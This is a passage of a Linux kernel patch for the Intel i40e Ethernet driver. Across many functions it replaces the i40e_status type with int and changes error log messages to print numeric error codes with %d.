++				 aq_ret,
+ 				 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		}
+ 		aq_ret = i40e_aq_set_vsi_multicast_promiscuous(
+@@ -2510,8 +2510,8 @@ static int i40e_set_promiscuous(struct i40e_pf *pf, bool promisc)
+ 						  promisc, NULL);
+ 		if (aq_ret) {
+ 			dev_info(&pf->pdev->dev,
+-				 "set multicast promisc failed, err %s, aq_err %s\n",
+-				 i40e_stat_str(hw, aq_ret),
++				 "set multicast promisc failed, err %d, aq_err %s\n",
++				 aq_ret,
+ 				 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		}
+ 	}
+@@ -2541,12 +2541,12 @@ int i40e_sync_vsi_filters(struct i40e_vsi *vsi)
+ 	unsigned int vlan_filters = 0;
+ 	char vsi_name[16] = "PF";
+ 	int filter_list_len = 0;
+-	i40e_status aq_ret = 0;
+ 	u32 changed_flags = 0;
+ 	struct hlist_node *h;
+ 	struct i40e_pf *pf;
+ 	int num_add = 0;
+ 	int num_del = 0;
++	int aq_ret = 0;
+ 	int retval = 0;
+ 	u16 cmd_flags;
+ 	int list_size;
+@@ -2814,9 +2814,9 @@ int i40e_sync_vsi_filters(struct i40e_vsi *vsi)
+ 			retval = i40e_aq_rc_to_posix(aq_ret,
+ 						     hw->aq.asq_last_status);
+ 			dev_info(&pf->pdev->dev,
+-				 "set multi promisc failed on %s, err %s aq_err %s\n",
++				 "set multi promisc failed on %s, err %d aq_err %s\n",
+ 				 vsi_name,
+-				 i40e_stat_str(hw, aq_ret),
++				 aq_ret,
+ 				 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		} else {
+ 			dev_info(&pf->pdev->dev, "%s allmulti mode.\n",
+@@ -2834,10 +2834,10 @@ int i40e_sync_vsi_filters(struct i40e_vsi *vsi)
+ 			retval = i40e_aq_rc_to_posix(aq_ret,
+ 						     hw->aq.asq_last_status);
+ 			dev_info(&pf->pdev->dev,
+-				 "Setting promiscuous %s failed on %s, err %s aq_err %s\n",
++				 "Setting promiscuous %s failed on %s, err %d aq_err %s\n",
+ 				 cur_promisc ? "on" : "off",
+ 				 vsi_name,
+-				 i40e_stat_str(hw, aq_ret),
++				 aq_ret,
+ 				 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		}
+ 	}
+@@ -2965,7 +2965,7 @@ int i40e_ioctl(struct net_device *netdev, struct ifreq *ifr, int cmd)
+ void i40e_vlan_stripping_enable(struct i40e_vsi *vsi)
+ {
+ 	struct i40e_vsi_context ctxt;
+-	i40e_status ret;
++	int ret;
+ 
+ 	/* Don't modify stripping options if a port VLAN is active */
+ 	if (vsi->info.pvid)
+@@ -2985,8 +2985,8 @@ void i40e_vlan_stripping_enable(struct i40e_vsi *vsi)
+ 	ret = i40e_aq_update_vsi_params(&vsi->back->hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&vsi->back->pdev->dev,
+-			 "update vlan stripping failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&vsi->back->hw, ret),
++			 "update vlan stripping failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&vsi->back->hw,
+ 				     vsi->back->hw.aq.asq_last_status));
+ 	}
+@@ -2999,7 +2999,7 @@ void i40e_vlan_stripping_enable(struct i40e_vsi *vsi)
+ void i40e_vlan_stripping_disable(struct i40e_vsi *vsi)
+ {
+ 	struct i40e_vsi_context ctxt;
+-	i40e_status ret;
++	int ret;
+ 
+ 	/* Don't modify stripping options if a port VLAN is active */
+ 	if (vsi->info.pvid)
+@@ -3020,8 +3020,8 @@ void i40e_vlan_stripping_disable(struct i40e_vsi *vsi)
+ 	ret = i40e_aq_update_vsi_params(&vsi->back->hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&vsi->back->pdev->dev,
+-			 "update vlan stripping failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&vsi->back->hw, ret),
++			 "update vlan stripping failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&vsi->back->hw,
+ 				     vsi->back->hw.aq.asq_last_status));
+ 	}
+@@ -3252,7 +3252,7 @@ static void i40e_restore_vlan(struct i40e_vsi *vsi)
+ int i40e_vsi_add_pvid(struct i40e_vsi *vsi, u16 vid)
+ {
+ 	struct i40e_vsi_context ctxt;
+-	i40e_status ret;
++	int ret;
+ 
+ 	vsi->info.valid_sections = cpu_to_le16(I40E_AQ_VSI_PROP_VLAN_VALID);
+ 	vsi->info.pvid = cpu_to_le16(vid);
+@@ -3265,8 +3265,8 @@ int i40e_vsi_add_pvid(struct i40e_vsi *vsi, u16 vid)
+ 	ret = i40e_aq_update_vsi_params(&vsi->back->hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&vsi->back->pdev->dev,
+-			 "add pvid failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&vsi->back->hw, ret),
++			 "add pvid failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&vsi->back->hw,
+ 				     vsi->back->hw.aq.asq_last_status));
+ 		return -ENOENT;
+@@ -3429,8 +3429,8 @@ static int i40e_configure_tx_ring(struct i40e_ring *ring)
+ 	u16 pf_q = vsi->base_queue + ring->queue_index;
+ 	struct i40e_hw *hw = &vsi->back->hw;
+ 	struct i40e_hmc_obj_txq tx_ctx;
+-	i40e_status err = 0;
+ 	u32 qtx_ctl = 0;
++	int err = 0;
+ 
+ 	if (ring_is_xdp(ring))
+ 		ring->xsk_pool = i40e_xsk_pool(ring);
+@@ -3554,7 +3554,7 @@ static int i40e_configure_rx_ring(struct i40e_ring *ring)
+ 	u16 pf_q = vsi->base_queue + ring->queue_index;
+ 	struct i40e_hw *hw = &vsi->back->hw;
+ 	struct i40e_hmc_obj_rxq rx_ctx;
+-	i40e_status err = 0;
++	int err = 0;
+ 	bool ok;
+ 	int ret;
+ 
+@@ -5525,16 +5525,16 @@ static int i40e_vsi_get_bw_info(struct i40e_vsi *vsi)
+ 	struct i40e_aqc_query_vsi_bw_config_resp bw_config = {0};
+ 	struct i40e_pf *pf = vsi->back;
+ 	struct i40e_hw *hw = &pf->hw;
+-	i40e_status ret;
+ 	u32 tc_bw_max;
++	int ret;
+ 	int i;
+ 
+ 	/* Get the VSI level BW configuration */
+ 	ret = i40e_aq_query_vsi_bw_config(hw, vsi->seid, &bw_config, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't get PF vsi bw config, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "couldn't get PF vsi bw config, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return -EINVAL;
+ 	}
+@@ -5544,8 +5544,8 @@ static int i40e_vsi_get_bw_info(struct i40e_vsi *vsi)
+ 					       NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't get PF vsi ets bw config, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "couldn't get PF vsi ets bw config, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return -EINVAL;
+ 	}
+@@ -5586,7 +5586,7 @@ static int i40e_vsi_configure_bw_alloc(struct i40e_vsi *vsi, u8 enabled_tc,
+ {
+ 	struct i40e_aqc_configure_vsi_tc_bw_data bw_data;
+ 	struct i40e_pf *pf = vsi->back;
+-	i40e_status ret;
++	int ret;
+ 	int i;
+ 
+ 	/* There is no need to reset BW when mqprio mode is on.  */
+@@ -5734,8 +5734,8 @@ int i40e_update_adq_vsi_queues(struct i40e_vsi *vsi, int vsi_offset)
+ 
+ 	ret = i40e_aq_update_vsi_params(hw, &ctxt, NULL);
+ 	if (ret) {
+-		dev_info(&pf->pdev->dev, "Update vsi config failed, err %s aq_err %s\n",
+-			 i40e_stat_str(hw, ret),
++		dev_info(&pf->pdev->dev, "Update vsi config failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		return ret;
+ 	}
+@@ -5790,8 +5790,8 @@ static int i40e_vsi_config_tc(struct i40e_vsi *vsi, u8 enabled_tc)
+ 						  &bw_config, NULL);
+ 		if (ret) {
+ 			dev_info(&pf->pdev->dev,
+-				 "Failed querying vsi bw info, err %s aq_err %s\n",
+-				 i40e_stat_str(hw, ret),
++				 "Failed querying vsi bw info, err %d aq_err %s\n",
++				 ret,
+ 				 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 			goto out;
+ 		}
+@@ -5857,8 +5857,8 @@ static int i40e_vsi_config_tc(struct i40e_vsi *vsi, u8 enabled_tc)
+ 	ret = i40e_aq_update_vsi_params(hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Update vsi tc config failed, err %s aq_err %s\n",
+-			 i40e_stat_str(hw, ret),
++			 "Update vsi tc config failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		goto out;
+ 	}
+@@ -5870,8 +5870,8 @@ static int i40e_vsi_config_tc(struct i40e_vsi *vsi, u8 enabled_tc)
+ 	ret = i40e_vsi_get_bw_info(vsi);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Failed updating vsi bw info, err %s aq_err %s\n",
+-			 i40e_stat_str(hw, ret),
++			 "Failed updating vsi bw info, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		goto out;
+ 	}
+@@ -5962,8 +5962,8 @@ int i40e_set_bw_limit(struct i40e_vsi *vsi, u16 seid, u64 max_tx_rate)
+ 					  I40E_MAX_BW_INACTIVE_ACCUM, NULL);
+ 	if (ret)
+ 		dev_err(&pf->pdev->dev,
+-			"Failed set tx rate (%llu Mbps) for vsi->seid %u, err %s aq_err %s\n",
+-			max_tx_rate, seid, i40e_stat_str(&pf->hw, ret),
++			"Failed set tx rate (%llu Mbps) for vsi->seid %u, err %d aq_err %s\n",
++			max_tx_rate, seid, ret,
+ 			i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 	return ret;
+ }
+@@ -6038,8 +6038,8 @@ static void i40e_remove_queue_channels(struct i40e_vsi *vsi)
+ 			last_aq_status = pf->hw.aq.asq_last_status;
+ 			if (ret)
+ 				dev_info(&pf->pdev->dev,
+-					 "Failed to delete cloud filter, err %s aq_err %s\n",
+-					 i40e_stat_str(&pf->hw, ret),
++					 "Failed to delete cloud filter, err %d aq_err %s\n",
++					 ret,
+ 					 i40e_aq_str(&pf->hw, last_aq_status));
+ 			kfree(cfilter);
+ 		}
+@@ -6173,8 +6173,8 @@ static int i40e_vsi_reconfig_rss(struct i40e_vsi *vsi, u16 rss_size)
+ 	ret = i40e_config_rss(vsi, seed, lut, vsi->rss_table_size);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Cannot set RSS lut, err %s aq_err %s\n",
+-			 i40e_stat_str(hw, ret),
++			 "Cannot set RSS lut, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		kfree(lut);
+ 		return ret;
+@@ -6272,8 +6272,8 @@ static int i40e_add_channel(struct i40e_pf *pf, u16 uplink_seid,
+ 	ret = i40e_aq_add_vsi(hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "add new vsi failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "add new vsi failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw,
+ 				     pf->hw.aq.asq_last_status));
+ 		return -ENOENT;
+@@ -6304,7 +6304,7 @@ static int i40e_channel_config_bw(struct i40e_vsi *vsi, struct i40e_channel *ch,
+ 				  u8 *bw_share)
+ {
+ 	struct i40e_aqc_configure_vsi_tc_bw_data bw_data;
+-	i40e_status ret;
++	int ret;
+ 	int i;
+ 
+ 	memset(&bw_data, 0, sizeof(bw_data));
+@@ -6340,9 +6340,9 @@ static int i40e_channel_config_tx_ring(struct i40e_pf *pf,
+ 				       struct i40e_vsi *vsi,
+ 				       struct i40e_channel *ch)
+ {
+-	i40e_status ret;
+-	int i;
+ 	u8 bw_share[I40E_MAX_TRAFFIC_CLASS] = {0};
++	int ret;
++	int i;
+ 
+ 	/* Enable ETS TCs with equal BW Share for now across all VSIs */
+ 	for (i = 0; i < I40E_MAX_TRAFFIC_CLASS; i++) {
+@@ -6518,8 +6518,8 @@ static int i40e_validate_and_set_switch_mode(struct i40e_vsi *vsi)
+ 					mode, NULL);
+ 	if (ret && hw->aq.asq_last_status != I40E_AQ_RC_ESRCH)
+ 		dev_err(&pf->pdev->dev,
+-			"couldn't set switch config bits, err %s aq_err %s\n",
+-			i40e_stat_str(hw, ret),
++			"couldn't set switch config bits, err %d aq_err %s\n",
++			ret,
+ 			i40e_aq_str(hw,
+ 				    hw->aq.asq_last_status));
+ 
+@@ -6719,8 +6719,8 @@ int i40e_veb_config_tc(struct i40e_veb *veb, u8 enabled_tc)
+ 						   &bw_data, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "VEB bw config failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "VEB bw config failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		goto out;
+ 	}
+@@ -6729,8 +6729,8 @@ int i40e_veb_config_tc(struct i40e_veb *veb, u8 enabled_tc)
+ 	ret = i40e_veb_get_bw_info(veb);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Failed getting veb bw config, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "Failed getting veb bw config, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 	}
+ 
+@@ -6813,8 +6813,8 @@ static int i40e_resume_port_tx(struct i40e_pf *pf)
+ 	ret = i40e_aq_resume_port_tx(hw, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Resume Port Tx failed, err %s aq_err %s\n",
+-			  i40e_stat_str(&pf->hw, ret),
++			 "Resume Port Tx failed, err %d aq_err %s\n",
++			  ret,
+ 			  i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		/* Schedule PF reset to recover */
+ 		set_bit(__I40E_PF_RESET_REQUESTED, pf->state);
+@@ -6838,8 +6838,8 @@ static int i40e_suspend_port_tx(struct i40e_pf *pf)
+ 	ret = i40e_aq_suspend_port_tx(hw, pf->mac_seid, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Suspend Port Tx failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "Suspend Port Tx failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		/* Schedule PF reset to recover */
+ 		set_bit(__I40E_PF_RESET_REQUESTED, pf->state);
+@@ -6878,8 +6878,8 @@ static int i40e_hw_set_dcb_config(struct i40e_pf *pf,
+ 	ret = i40e_set_dcb_config(&pf->hw);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Set DCB Config failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "Set DCB Config failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		goto out;
+ 	}
+@@ -6995,8 +6995,8 @@ int i40e_hw_dcb_config(struct i40e_pf *pf, struct i40e_dcbx_config *new_cfg)
+ 		 i40e_aqc_opc_modify_switching_comp_ets, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Modify Port ETS failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "Modify Port ETS failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		goto out;
+ 	}
+@@ -7033,8 +7033,8 @@ int i40e_hw_dcb_config(struct i40e_pf *pf, struct i40e_dcbx_config *new_cfg)
+ 	ret = i40e_aq_dcb_updated(&pf->hw, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "DCB Updated failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "DCB Updated failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		goto out;
+ 	}
+@@ -7117,8 +7117,8 @@ int i40e_dcb_sw_default_config(struct i40e_pf *pf)
+ 		 i40e_aqc_opc_enable_switching_comp_ets, NULL);
+ 	if (err) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Enable Port ETS failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, err),
++			 "Enable Port ETS failed, err %d aq_err %s\n",
++			 err,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		err = -ENOENT;
+ 		goto out;
+@@ -7197,8 +7197,8 @@ static int i40e_init_pf_dcb(struct i40e_pf *pf)
+ 		pf->flags |= I40E_FLAG_DISABLE_FW_LLDP;
+ 	} else {
+ 		dev_info(&pf->pdev->dev,
+-			 "Query for DCB configuration failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, err),
++			 "Query for DCB configuration failed, err %d aq_err %s\n",
++			 err,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 	}
+ 
+@@ -7416,15 +7416,15 @@ static void i40e_vsi_reinit_locked(struct i40e_vsi *vsi)
+  * @pf: board private structure
+  * @is_up: whether the link state should be forced up or down
+  **/
+-static i40e_status i40e_force_link_state(struct i40e_pf *pf, bool is_up)
++static int i40e_force_link_state(struct i40e_pf *pf, bool is_up)
+ {
+ 	struct i40e_aq_get_phy_abilities_resp abilities;
+ 	struct i40e_aq_set_phy_config config = {0};
+ 	bool non_zero_phy_type = is_up;
+ 	struct i40e_hw *hw = &pf->hw;
+-	i40e_status err;
+ 	u64 mask;
+ 	u8 speed;
++	int err;
+ 
+ 	/* Card might've been put in an unstable state by other drivers
+ 	 * and applications, which causes incorrect speed values being
+@@ -7436,8 +7436,8 @@ static i40e_status i40e_force_link_state(struct i40e_pf *pf, bool is_up)
+ 					   NULL);
+ 	if (err) {
+ 		dev_err(&pf->pdev->dev,
+-			"failed to get phy cap., ret =  %s last_status =  %s\n",
+-			i40e_stat_str(hw, err),
++			"failed to get phy cap., ret =  %d last_status =  %s\n",
++			err,
+ 			i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		return err;
+ 	}
+@@ -7448,8 +7448,8 @@ static i40e_status i40e_force_link_state(struct i40e_pf *pf, bool is_up)
+ 					   NULL);
+ 	if (err) {
+ 		dev_err(&pf->pdev->dev,
+-			"failed to get phy cap., ret =  %s last_status =  %s\n",
+-			i40e_stat_str(hw, err),
++			"failed to get phy cap., ret =  %d last_status =  %s\n",
++			err,
+ 			i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		return err;
+ 	}
+@@ -7493,8 +7493,8 @@ static i40e_status i40e_force_link_state(struct i40e_pf *pf, bool is_up)
+ 
+ 	if (err) {
+ 		dev_err(&pf->pdev->dev,
+-			"set phy config ret =  %s last_status =  %s\n",
+-			i40e_stat_str(&pf->hw, err),
++			"set phy config ret =  %d last_status =  %s\n",
++			err,
+ 			i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return err;
+ 	}
+@@ -7657,11 +7657,11 @@ static void i40e_vsi_set_default_tc_config(struct i40e_vsi *vsi)
+  * This function deletes a mac filter on the channel VSI which serves as the
+  * macvlan. Returns 0 on success.
+  **/
+-static i40e_status i40e_del_macvlan_filter(struct i40e_hw *hw, u16 seid,
+-					   const u8 *macaddr, int *aq_err)
++static int i40e_del_macvlan_filter(struct i40e_hw *hw, u16 seid,
++				   const u8 *macaddr, int *aq_err)
+ {
+ 	struct i40e_aqc_remove_macvlan_element_data element;
+-	i40e_status status;
++	int status;
+ 
+ 	memset(&element, 0, sizeof(element));
+ 	ether_addr_copy(element.mac_addr, macaddr);
+@@ -7683,12 +7683,12 @@ static i40e_status i40e_del_macvlan_filter(struct i40e_hw *hw, u16 seid,
+  * This function adds a mac filter on the channel VSI which serves as the
+  * macvlan. Returns 0 on success.
+  **/
+-static i40e_status i40e_add_macvlan_filter(struct i40e_hw *hw, u16 seid,
+-					   const u8 *macaddr, int *aq_err)
++static int i40e_add_macvlan_filter(struct i40e_hw *hw, u16 seid,
++				   const u8 *macaddr, int *aq_err)
+ {
+ 	struct i40e_aqc_add_macvlan_element_data element;
+-	i40e_status status;
+ 	u16 cmd_flags = 0;
++	int status;
+ 
+ 	ether_addr_copy(element.mac_addr, macaddr);
+ 	element.vlan_tag = 0;
+@@ -7834,8 +7834,8 @@ static int i40e_fwd_ring_up(struct i40e_vsi *vsi, struct net_device *vdev,
+ 			rx_ring->netdev = NULL;
+ 		}
+ 		dev_info(&pf->pdev->dev,
+-			 "Error adding mac filter on macvlan err %s, aq_err %s\n",
+-			  i40e_stat_str(hw, ret),
++			 "Error adding mac filter on macvlan err %d, aq_err %s\n",
++			  ret,
+ 			  i40e_aq_str(hw, aq_err));
+ 		netdev_err(vdev, "L2fwd offload disabled to L2 filter error\n");
+ 	}
+@@ -7907,8 +7907,8 @@ static int i40e_setup_macvlans(struct i40e_vsi *vsi, u16 macvlan_cnt, u16 qcnt,
+ 	ret = i40e_aq_update_vsi_params(hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Update vsi tc config failed, err %s aq_err %s\n",
+-			 i40e_stat_str(hw, ret),
++			 "Update vsi tc config failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		return ret;
+ 	}
+@@ -8123,8 +8123,8 @@ static void i40e_fwd_del(struct net_device *netdev, void *vdev)
+ 				ch->fwd = NULL;
+ 			} else {
+ 				dev_info(&pf->pdev->dev,
+-					 "Error deleting mac filter on macvlan err %s, aq_err %s\n",
+-					  i40e_stat_str(hw, ret),
++					 "Error deleting mac filter on macvlan err %d, aq_err %s\n",
++					  ret,
+ 					  i40e_aq_str(hw, aq_err));
+ 			}
+ 			break;
+@@ -8875,8 +8875,7 @@ static int i40e_delete_clsflower(struct i40e_vsi *vsi,
+ 	kfree(filter);
+ 	if (err) {
+ 		dev_err(&pf->pdev->dev,
+-			"Failed to delete cloud filter, err %s\n",
+-			i40e_stat_str(&pf->hw, err));
++			"Failed to delete cloud filter, err %d\n", err);
+ 		return i40e_aq_rc_to_posix(err, pf->hw.aq.asq_last_status);
+ 	}
+ 
+@@ -9438,8 +9437,8 @@ static int i40e_handle_lldp_event(struct i40e_pf *pf,
+ 			pf->flags &= ~I40E_FLAG_DCB_CAPABLE;
+ 		} else {
+ 			dev_info(&pf->pdev->dev,
+-				 "Failed querying DCB configuration data from firmware, err %s aq_err %s\n",
+-				 i40e_stat_str(&pf->hw, ret),
++				 "Failed querying DCB configuration data from firmware, err %d aq_err %s\n",
++				 ret,
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 		}
+@@ -9887,8 +9886,8 @@ static void i40e_link_event(struct i40e_pf *pf)
+ {
+ 	struct i40e_vsi *vsi = pf->vsi[pf->lan_vsi];
+ 	u8 new_link_speed, old_link_speed;
+-	i40e_status status;
+ 	bool new_link, old_link;
++	int status;
+ #ifdef CONFIG_I40E_DCB
+ 	int err;
+ #endif /* CONFIG_I40E_DCB */
+@@ -10099,9 +10098,9 @@ static void i40e_clean_adminq_subtask(struct i40e_pf *pf)
+ 	struct i40e_arq_event_info event;
+ 	struct i40e_hw *hw = &pf->hw;
+ 	u16 pending, i = 0;
+-	i40e_status ret;
+ 	u16 opcode;
+ 	u32 oldval;
++	int ret;
+ 	u32 val;
+ 
+ 	/* Do not run clean AQ when PF reset fails */
+@@ -10265,8 +10264,8 @@ static void i40e_enable_pf_switch_lb(struct i40e_pf *pf)
+ 	ret = i40e_aq_get_vsi_params(&pf->hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't get PF vsi config, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "couldn't get PF vsi config, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return;
+ 	}
+@@ -10277,8 +10276,8 @@ static void i40e_enable_pf_switch_lb(struct i40e_pf *pf)
+ 	ret = i40e_aq_update_vsi_params(&vsi->back->hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "update vsi switch failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "update vsi switch failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 	}
+ }
+@@ -10301,8 +10300,8 @@ static void i40e_disable_pf_switch_lb(struct i40e_pf *pf)
+ 	ret = i40e_aq_get_vsi_params(&pf->hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't get PF vsi config, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "couldn't get PF vsi config, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return;
+ 	}
+@@ -10313,8 +10312,8 @@ static void i40e_disable_pf_switch_lb(struct i40e_pf *pf)
+ 	ret = i40e_aq_update_vsi_params(&vsi->back->hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "update vsi switch failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "update vsi switch failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 	}
+ }
+@@ -10458,8 +10457,8 @@ static int i40e_get_capabilities(struct i40e_pf *pf,
+ 			buf_len = data_size;
+ 		} else if (pf->hw.aq.asq_last_status != I40E_AQ_RC_OK || err) {
+ 			dev_info(&pf->pdev->dev,
+-				 "capability discovery failed, err %s aq_err %s\n",
+-				 i40e_stat_str(&pf->hw, err),
++				 "capability discovery failed, err %d aq_err %s\n",
++				 err,
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 			return -ENODEV;
+@@ -10580,7 +10579,7 @@ static int i40e_rebuild_cloud_filters(struct i40e_vsi *vsi, u16 seid)
+ 	struct i40e_cloud_filter *cfilter;
+ 	struct i40e_pf *pf = vsi->back;
+ 	struct hlist_node *node;
+-	i40e_status ret;
++	int ret;
+ 
+ 	/* Add cloud filters back if they exist */
+ 	hlist_for_each_entry_safe(cfilter, node, &pf->cloud_filter_list,
+@@ -10596,8 +10595,8 @@ static int i40e_rebuild_cloud_filters(struct i40e_vsi *vsi, u16 seid)
+ 
+ 		if (ret) {
+ 			dev_dbg(&pf->pdev->dev,
+-				"Failed to rebuild cloud filter, err %s aq_err %s\n",
+-				i40e_stat_str(&pf->hw, ret),
++				"Failed to rebuild cloud filter, err %d aq_err %s\n",
++				ret,
+ 				i40e_aq_str(&pf->hw,
+ 					    pf->hw.aq.asq_last_status));
+ 			return ret;
+@@ -10615,7 +10614,7 @@ static int i40e_rebuild_cloud_filters(struct i40e_vsi *vsi, u16 seid)
+ static int i40e_rebuild_channels(struct i40e_vsi *vsi)
+ {
+ 	struct i40e_channel *ch, *ch_tmp;
+-	i40e_status ret;
++	int ret;
+ 
+ 	if (list_empty(&vsi->ch_list))
+ 		return 0;
+@@ -10691,7 +10690,7 @@ static void i40e_clean_xps_state(struct i40e_vsi *vsi)
+ static void i40e_prep_for_reset(struct i40e_pf *pf)
+ {
+ 	struct i40e_hw *hw = &pf->hw;
+-	i40e_status ret = 0;
++	int ret = 0;
+ 	u32 v;
+ 
+ 	clear_bit(__I40E_RESET_INTR_RECEIVED, pf->state);
+@@ -10796,7 +10795,7 @@ static void i40e_get_oem_version(struct i40e_hw *hw)
+ static int i40e_reset(struct i40e_pf *pf)
+ {
+ 	struct i40e_hw *hw = &pf->hw;
+-	i40e_status ret;
++	int ret;
+ 
+ 	ret = i40e_pf_reset(hw);
+ 	if (ret) {
+@@ -10821,7 +10820,7 @@ static void i40e_rebuild(struct i40e_pf *pf, bool reinit, bool lock_acquired)
+ 	const bool is_recovery_mode_reported = i40e_check_recovery_mode(pf);
+ 	struct i40e_vsi *vsi = pf->vsi[pf->lan_vsi];
+ 	struct i40e_hw *hw = &pf->hw;
+-	i40e_status ret;
++	int ret;
+ 	u32 val;
+ 	int v;
+ 
+@@ -10837,8 +10836,8 @@ static void i40e_rebuild(struct i40e_pf *pf, bool reinit, bool lock_acquired)
+ 	/* rebuild the basics for the AdminQ, HMC, and initial HW switch */
+ 	ret = i40e_init_adminq(&pf->hw);
+ 	if (ret) {
+-		dev_info(&pf->pdev->dev, "Rebuild AdminQ failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++		dev_info(&pf->pdev->dev, "Rebuild AdminQ failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		goto clear_recovery;
+ 	}
+@@ -10949,8 +10948,8 @@ static void i40e_rebuild(struct i40e_pf *pf, bool reinit, bool lock_acquired)
